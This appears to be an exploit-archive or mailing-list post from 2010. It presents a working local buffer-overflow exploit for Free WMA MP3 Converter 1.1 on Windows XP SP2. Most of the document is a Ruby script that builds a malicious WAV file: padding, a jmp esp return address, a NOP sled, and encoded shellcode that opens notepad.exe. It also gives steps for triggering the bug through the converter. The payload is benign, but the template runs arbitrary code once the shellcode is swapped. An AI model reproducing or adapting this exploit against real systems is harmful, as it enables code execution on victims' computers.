Free WMA MP3 Converter version 1.1 local exploit that spawns notepad.exe.
c3b44064422e21ee9687ca1e3c34cc121e7b41eaa69a3a0f69add0c44d00b2e8
sorry was missing some text from my previous email
# Exploit Title: Free WMA MP3 Converter
# Date: 02/04/2010
# Author: Richard leahy
# Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210
# Version: 1.1
# Tested on: Windows Xp Sp2
#category local exploit
to trigger vulnrability open up application choose wav to mp3 load the specially crafted wav file and click convert. Probably works for all the other options too
eg mp3 to wav etc. run the code below and pipe it into a .wav file
#code
!#/usr/bin/env ruby
nop = "\x90"
#imagehlp
jmp_esp = [0x76cafa32].pack('V')
#shellcode opens notepad
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
puts boom
________________________________
Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>